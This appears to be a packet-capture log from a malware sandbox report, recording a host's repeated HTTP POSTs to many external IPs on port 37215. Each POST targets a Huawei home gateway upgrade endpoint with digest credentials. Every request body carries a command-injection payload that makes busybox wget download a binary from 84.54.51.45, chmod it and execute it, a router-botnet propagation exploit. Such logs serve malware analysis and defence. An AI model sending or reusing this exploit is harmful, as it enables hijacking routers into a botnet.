                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2041192.168.2.154646041.225.11.16537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663753986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2042192.168.2.154887641.38.75.12837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663753986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2043192.168.2.155118441.120.54.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663754940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2044192.168.2.154562441.109.248.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663813114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2045192.168.2.155617041.184.139.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663815022 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2046192.168.2.153557441.22.182.1737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663832903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2047192.168.2.155799841.165.10.4037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663852930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2048192.168.2.153553041.249.34.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.666959047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2049192.168.2.155710441.43.115.20837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667016983 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2050192.168.2.153982441.158.125.15237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667016983 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
